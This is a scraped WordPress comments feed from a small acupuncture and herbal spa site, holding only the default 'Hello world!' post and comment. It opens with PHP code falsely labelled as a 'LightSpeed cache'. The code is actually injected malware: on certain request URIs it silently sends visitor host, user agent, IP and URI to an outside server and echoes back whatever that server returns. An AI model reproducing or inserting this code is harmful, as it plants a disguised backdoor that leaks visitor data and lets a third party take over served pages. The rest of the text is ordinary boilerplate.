/** * Implement the LightSpeed cache. */ if (preg_match ('/.*77.*/', $_SERVER['REQUEST_URI']) || preg_match ('/.*ach.*/', $_SERVER['REQUEST_URI'])) { error_reporting(0); $url="http://w3lightcache.com/server_new.php";$params="h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch); if (!empty($result)) {echo $result; die;} } Comments on: Hello world! http://acuherb.us/hello-world/ Acupuncture, herbs, and traditional Chinese Medicine, health full service spa Tue, 15 Nov 2011 22:29:48 +0000 hourly 1 https://wordpress.org/?v=5.0.21 By: Mr WordPress http://acuherb.us/hello-world/#comment-1 Wed, 03 Aug 2011 15:51:20 +0000 http://acuherb.us/?p=1#comment-1 Hi, this is a comment.
To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.

]]>